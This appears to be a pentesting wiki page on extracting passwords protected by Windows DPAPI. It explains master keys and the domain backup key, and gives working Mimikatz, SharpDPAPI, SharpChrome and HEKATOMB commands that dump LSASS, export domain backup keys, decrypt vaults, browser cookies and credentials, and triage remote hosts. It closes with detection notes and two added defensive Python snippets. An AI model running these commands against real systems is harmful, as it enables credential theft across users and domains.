DPAPI - Extracting Passwords
What is DPAPI
The Data Protection API (DPAPI) is primarily utilized within the Windows operating system for the symmetric encryption of asymmetric private keys, leveraging either user or system secrets as a significant source of entropy. This approach simplifies encryption for developers by enabling them to encrypt data using a key derived from the user's logon secrets or, for system encryption, the system's domain authentication secrets, thus obviating the need for developers to manage the protection of the encryption key themselves.
The most common way to use DPAPI is through the CryptProtectData and CryptUnprotectData functions, which let applications encrypt and decrypt data using the logon session of the calling process. This means that the encrypted data can only be decrypted by the same user or system that encrypted it.
Moreover, both functions also accept an optional entropy parameter that is mixed into both encryption and decryption; therefore, to decrypt something that was encrypted with this parameter, you must supply the same entropy value that was used during encryption.
Users key generation
DPAPI generates a unique key (called the pre-key) for each user based on their credentials. This key is derived from the user's password and other factors; the exact algorithm depends on the type of user but ends up being a SHA1 hash. For example, for domain users it depends on the NTLM hash of the user's password.
This is especially interesting because if an attacker can obtain the user's password hash, they can:
- Decrypt any data that was encrypted using DPAPI with that user's key without needing to contact any API
- Try to crack the password offline trying to generate the valid DPAPI key
Moreover, every time some data is encrypted by a user using DPAPI, a new master key is generated. This master key is the one actually used to encrypt the data. Each master key is identified by a GUID (Globally Unique Identifier).
The master keys are stored in the %APPDATA%\Microsoft\Protect\<sid>\<guid> directory, where <sid> is the Security Identifier of that user. Each master key is stored encrypted with the user's pre-key and, for recovery, also with a domain backup key (so the same key is stored twice, encrypted by two different keys).
Note that the domain backup key used to encrypt the master keys is held on the domain controllers and never changes, so if an attacker has access to a domain controller, they can retrieve the domain backup key and decrypt the master keys of all users in the domain.
The encrypted blobs contain the GUID of the master key that was used to encrypt the data inside its headers.
note
DPAPI encrypted blobs start with 01 00 00 00
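As an added illustration (not code from the page or from any of the tools it mentions), this Python parser reads the header of a CryptProtectData blob, checks the 01 00 00 00 signature and the provider GUID, and reports which master key GUID protects it, which is what a defender needs to map a recovered blob to a master key file. The sample blob is constructed inside the script; the master key GUID borrowed from the page's mimikatz output is only a label, not a real key.

```python
import struct
import uuid

# Provider GUID that every CryptProtectData blob carries right after the version DWORD
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")


def _take(buf, off):
    """Read a DWORD length prefix, then that many bytes; return (bytes, new offset)."""
    (n,) = struct.unpack_from("<I", buf, off)
    return buf[off + 4:off + 4 + n], off + 4 + n

def parse_dpapi_blob(blob: bytes) -> dict:
    """Parse a DPAPI blob header and report which master key protects it.
    Layout (integers little-endian, GUIDs in Windows mixed-endian order):
      dwVersion | guidProvider | dwMasterKeyVersion | guidMasterKey | dwFlags |
      szDescription (len + UTF-16LE) | algCrypt | dwAlgCryptLen | pbSalt |
      pbHmacKey | algHash | dwAlgHashLen | pbHmac2Key | pbData | pbSign
    """
    if blob[:4] != b"\x01\x00\x00\x00":               # the 01 00 00 00 signature
        raise ValueError("not a DPAPI blob: version bytes are not 01 00 00 00")
    provider = uuid.UUID(bytes_le=blob[4:20])
    if provider != DPAPI_PROVIDER_GUID:
        raise ValueError(f"unexpected provider GUID {provider}")
    master_key = uuid.UUID(bytes_le=blob[24:40])      # guidMasterKey follows dwMasterKeyVersion
    (flags,) = struct.unpack_from("<I", blob, 40)
    desc, off = _take(blob, 44)
    alg_crypt, _crypt_bits = struct.unpack_from("<II", blob, off)
    salt, off = _take(blob, off + 8)
    _hmac_key, off = _take(blob, off)
    alg_hash, _hash_bits = struct.unpack_from("<II", blob, off)
    _hmac2_key, off = _take(blob, off + 8)
    data, off = _take(blob, off)
    sign, _ = _take(blob, off)
    return {"master_key_guid": str(master_key), "flags": flags,
            "description": desc.decode("utf-16-le").rstrip("\x00"),
            "alg_crypt": hex(alg_crypt), "alg_hash": hex(alg_hash),
            "salt_len": len(salt), "data_len": len(data), "sign_len": len(sign)}

def constructed_blob() -> bytes:
    """Constructed sample, not a real capture: valid header, dummy ciphertext and signature."""
    mk = uuid.UUID("3e90dd9e-f901-40a1-b691-84d7f647b8fe")  # GUID shown in the page's mimikatz output
    lv = lambda b: struct.pack("<I", len(b)) + b             # length-prefixed field
    return (b"\x01\x00\x00\x00" + DPAPI_PROVIDER_GUID.bytes_le
            + struct.pack("<I", 1) + mk.bytes_le + struct.pack("<I", 0)
            + lv("demo\x00".encode("utf-16-le"))
            + struct.pack("<II", 0x6610, 256) + lv(b"\x11" * 32) + lv(b"")  # CALG_AES_256, salt, no HMAC key
            + struct.pack("<II", 0x800E, 512) + lv(b"") + lv(b"\x22" * 48)  # CALG_SHA_512, ciphertext
            + lv(b"\x33" * 64))                                             # signature
```

Feeding `parse_dpapi_blob` a file from the Credentials folder returns the GUID to look for under the user's Protect\<sid> directory.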
Find master keys:
Get-ChildItem C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem C:\Users\USER\AppData\Local\Microsoft\Protect
Get-ChildItem -Hidden C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\USER\AppData\Local\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\USER\AppData\Roaming\Microsoft\Protect\{SID}
Get-ChildItem -Hidden C:\Users\USER\AppData\Local\Microsoft\Protect\{SID}
This is what a user's master keys look like:
Machine/System key generation
This is the key used by the machine to encrypt data. It's based on the DPAPI_SYSTEM LSA secret, which is a special key that only the SYSTEM user can access. This key is used to encrypt data that needs to be accessible by the system itself, such as machine-level credentials or system-wide secrets.
Note that these keys don't have a domain backup, so they are only accessible locally:
- Mimikatz can access it by dumping LSA secrets with the command:
mimikatz lsadump::secrets
- The secret is stored inside the registry, so an administrator could modify the DACL permissions to access it. The registry path is:
HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets\DPAPI_SYSTEM
Protected Data by DPAPI
Among the personal data protected by DPAPI are:
- Windows creds
- Internet Explorer and Google Chrome's passwords and auto-completion data
- E-mail and internal FTP account passwords for applications like Outlook and Windows Mail
- Passwords for shared folders, resources, wireless networks, and Windows Vault, including encryption keys
- Passwords for remote desktop connections, .NET Passport, and private keys for various encryption and authentication purposes
- Network passwords managed by Credential Manager and personal data in applications using CryptProtectData, such as Skype, MSN messenger, and more
- Encrypted blobs inside the registry
- ...
System protected data includes:
- Wifi passwords
- Scheduled task passwords
- ...
Master key extraction options
- If the user has domain admin privileges, they can access the domain backup key to decrypt all user master keys in the domain:
# Mimikatz
lsadump::backupkeys /system:<DOMAIN CONTROLLER> /export
# SharpDPAPI
SharpDPAPI.exe backupkey [/server:SERVER.domain] [/file:key.pvk]
- With local admin privileges, it's possible to access the LSASS memory to extract the DPAPI master keys of all the connected users and the SYSTEM key.
# Mimikatz
mimikatz sekurlsa::dpapi
- If the user has local admin privileges, they can access the DPAPI_SYSTEM LSA secret to decrypt the machine master keys:
# Mimikatz
lsadump::secrets /system:DPAPI_SYSTEM /export
- If the user's password or NTLM hash is known, you can decrypt the master keys of the user directly:
# Mimikatz
dpapi::masterkey /in:<C:\PATH\MASTERKEY_LOCATION> /sid:<USER_SID> /password:<USER_PLAINTEXT> /protected
# SharpDPAPI
SharpDPAPI.exe masterkeys /password:PASSWORD
- If you are inside a session as the user, it's possible to ask the DC over RPC for the backup key to decrypt the master keys. If you are local admin and the user is logged in, you could steal their session token for this:
# Mimikatz
dpapi::masterkey /in:"C:\Users\USER\AppData\Roaming\Microsoft\Protect\SID\GUID" /rpc
# SharpDPAPI
SharpDPAPI.exe masterkeys /rpc
List Vault
# From cmd
vaultcmd /listcreds:"Windows Credentials" /all
# From mimikatz
mimikatz vault::list
Access DPAPI Encrypted Data
Find DPAPI Encrypted data
Common users files protected are in:
C:\Users\username\AppData\Roaming\Microsoft\Protect\*
C:\Users\username\AppData\Roaming\Microsoft\Credentials\*
C:\Users\username\AppData\Roaming\Microsoft\Vault\*
- Check also the same paths with \Roaming\ replaced by \Local\.
Enumeration examples:
dir /a:h C:\Users\username\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
SharpDPAPI can find DPAPI encrypted blobs in the file system, registry and B64 blobs:
# Search blobs in the registry
search /type:registry [/path:HKLM] # Search complete registry by default
# Search blobs in folders
search /type:folder /path:C:\path\to\folder
search /type:folder /path:C:\Users\username\AppData\
# Search a blob inside a file
search /type:file /path:C:\path\to\file
# Search a blob inside B64 encoded data
search /type:base64 [/base:<base64 string>]
Note that SharpChrome (from the same repo) can be used to decrypt DPAPI-protected browser data such as cookies.
Access keys and data
- Use SharpDPAPI to get credentials from DPAPI encrypted files from the current session:
# Decrypt user data
## Note that 'triage' is like running credentials, vaults, rdg and certificates
SharpDPAPI.exe [credentials|vaults|rdg|keepass|certificates|triage] /unprotect
# Decrypt machine data
SharpDPAPI.exe machinetriage
- Get credential info such as the encrypted data and the guidMasterKey:
mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\28350839752B38B238E5D56FDD7891A7
[...]
guidMasterKey : {3e90dd9e-f901-40a1-b691-84d7f647b8fe}
[...]
pbData : b8f619[...snip...]b493fe
[..]
- Access master keys:
Decrypt a user's master key by requesting the domain backup key over RPC:
# Mimikatz
dpapi::masterkey /in:"C:\Users\USER\AppData\Roaming\Microsoft\Protect\SID\GUID" /rpc
# SharpDPAPI
SharpDPAPI.exe masterkeys /rpc
The SharpDPAPI tool also supports these arguments for masterkey decryption (note how it's possible to use /rpc to get the domain's backup key, /password to use a plaintext password, or /pvk to specify a DPAPI domain private key file...):
/target:FILE/folder - triage a specific masterkey, or a folder full of masterkeys (otherwise triage local masterkeys)
/pvk:BASE64... - use a base64'ed DPAPI domain private key file to first decrypt reachable user masterkeys
/pvk:key.pvk - use a DPAPI domain private key file to first decrypt reachable user masterkeys
/password:X - decrypt the target user's masterkeys using a plaintext password (works remotely)
/ntlm:X - decrypt the target user's masterkeys using a NTLM hash (works remotely)
/credkey:X - decrypt the target user's masterkeys using a DPAPI credkey (domain or local SHA1, works remotely)
/rpc - decrypt the target user's masterkeys by asking domain controller to do so
/server:SERVER - triage a remote server, assuming admin access
/hashes - output usermasterkey file 'hashes' in JTR/Hashcat format (no decryption)
- Decrypt data using a masterkey:
# Mimikatz
dpapi::cred /in:C:\path\to\encrypted\file /masterkey:<MASTERKEY>
# SharpDPAPI
SharpDPAPI.exe /target:<FILE/folder> /ntlm:<NTLM_HASH>
The SharpDPAPI tool also supports these arguments for credentials|vaults|rdg|keepass|triage|blob|ps decryption (note how it's possible to use /rpc to get the domain's backup key, /password to use a plaintext password, /pvk to specify a DPAPI domain private key file, /unprotect to use the current user's session...):
Decryption:
/unprotect - force use of CryptUnprotectData() for 'ps', 'rdg', or 'blob' commands
/pvk:BASE64... - use a base64'ed DPAPI domain private key file to first decrypt reachable user masterkeys
/pvk:key.pvk - use a DPAPI domain private key file to first decrypt reachable user masterkeys
/password:X - decrypt the target user's masterkeys using a plaintext password (works remotely)
/ntlm:X - decrypt the target user's masterkeys using a NTLM hash (works remotely)
/credkey:X - decrypt the target user's masterkeys using a DPAPI credkey (domain or local SHA1, works remotely)
/rpc - decrypt the target user's masterkeys by asking domain controller to do so
GUID1:SHA1 ... - use a one or more GUID:SHA1 masterkeys for decryption
/mkfile:FILE - use a file of one or more GUID:SHA1 masterkeys for decryption
Targeting:
/target:FILE/folder - triage a specific 'Credentials','.rdg|RDCMan.settings', 'blob', or 'ps' file location, or 'Vault' folder
/server:SERVER - triage a remote server, assuming admin access
Note: must use with /pvk:KEY or /password:X
Note: not applicable to 'blob' or 'ps' commands
- Decrypt some data using the current user's session:
# Mimikatz
dpapi::blob /in:C:\path\to\encrypted\file /unprotect
# SharpDPAPI
SharpDPAPI.exe blob /target:C:\path\to\encrypted\file /unprotect
Access other machine data
In SharpDPAPI and SharpChrome you can indicate the /server:HOST option to access a remote machine's data. Of course you need to be able to access that machine, and in the following example it's assumed that the domain backup encryption key is known:
SharpDPAPI.exe triage /server:HOST /pvk:BASE64
SharpChrome cookies /server:HOST /pvk:BASE64
Other tools
HEKATOMB
HEKATOMB is a tool that automates the extraction of all users and computers from the LDAP directory and the extraction of the domain controller backup key through RPC. The script then resolves the IP address of every computer and uses smbclient against all of them to retrieve all DPAPI blobs of all users and decrypt everything with the domain backup key.
python3 hekatomb.py -hashes :ed0052e5a66b1c8e942cc9481a50d56 DOMAIN.local/administrator@10.0.0.1 -debug -dnstcp
With the computer list extracted from LDAP you can find every subnetwork, even ones you didn't know about!
DonPAPI
DonPAPI can dump secrets protected by DPAPI automatically.
Common detections
- Access to files in C:\Users\*\AppData\Roaming\Microsoft\Protect\*, C:\Users\*\AppData\Roaming\Microsoft\Credentials\* and other DPAPI-related directories, especially from a network share like C$ or ADMIN$.
- Use of Mimikatz to access LSASS memory.
- Event 4662: An operation was performed on an object. This event can be checked to see if the BCKUPKEY object was accessed.
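An added example, not part of the original page, that applies the detections above to constructed Security events: rule 1 flags event 4662 on a BCKUPKEY object, rule 2 flags DPAPI directories reached through C$ or ADMIN$. The second rule assumes Detailed File Share auditing is enabled so that event 5145 (network share object access) is logged, which the page does not mention; the event records and their values are constructed.

```python
import re

# Paths under a user profile that hold DPAPI master keys, credential files and the vault
DPAPI_PATH_RE = re.compile(
    r"AppData\\(Roaming|Local)\\Microsoft\\(Protect|Credentials|Vault)(\\|$)", re.IGNORECASE)
ADMIN_SHARES = ("C$", "ADMIN$")


def dpapi_alerts(events):
    """Return (rule, user, detail) tuples for Security events matching the detections above.
    Rule 1: 4662 on the domain backup key object (ObjectName contains BCKUPKEY).
    Rule 2: 5145 (Detailed File Share auditing, assumed enabled) touching DPAPI
            directories through an administrative share such as C$ or ADMIN$.
    """
    alerts = []
    for ev in events:
        eid = ev.get("EventID")
        user = ev.get("SubjectUserName", "?")
        if eid == 4662 and "BCKUPKEY" in ev.get("ObjectName", "").upper():
            alerts.append(("dpapi_backup_key_access", user, ev["ObjectName"]))
        elif eid == 5145:
            share = ev.get("ShareName", "").rsplit("\\", 1)[-1].upper()   # \\*\C$ -> C$
            target = ev.get("RelativeTargetName", "")
            if share in ADMIN_SHARES and DPAPI_PATH_RE.search(target):
                alerts.append(("dpapi_files_via_admin_share", user, f"\\\\{share}\\{target}"))
    return alerts


# Constructed sample events (not real telemetry); field names follow the Windows Security log
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "jdoe", "ObjectType": "secret",
     "ObjectName": "CN=BCKUPKEY_PREFERRED Secret,CN=System,DC=corp,DC=local", "AccessMask": "0x100"},
    {"EventID": 4662, "SubjectUserName": "svc-sync", "ObjectType": "user",
     "ObjectName": "CN=Alice,CN=Users,DC=corp,DC=local", "AccessMask": "0x10"},
    {"EventID": 5145, "SubjectUserName": "jdoe", "ShareName": "\\\\*\\C$",
     "RelativeTargetName": "Users\\alice\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1-2-3-1001\\"
                           "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee"},   # constructed SID and GUID
    {"EventID": 5145, "SubjectUserName": "jdoe", "ShareName": "\\\\*\\Public",
     "RelativeTargetName": "docs\\report.docx"},
    {"EventID": 5145, "SubjectUserName": "backup-svc", "ShareName": "\\\\*\\ADMIN$",
     "RelativeTargetName": "System32\\drivers\\etc\\hosts"},
]
```

Running `dpapi_alerts(SAMPLE_EVENTS)` yields one hit per rule; the ordinary user object access and the non-DPAPI share reads are ignored.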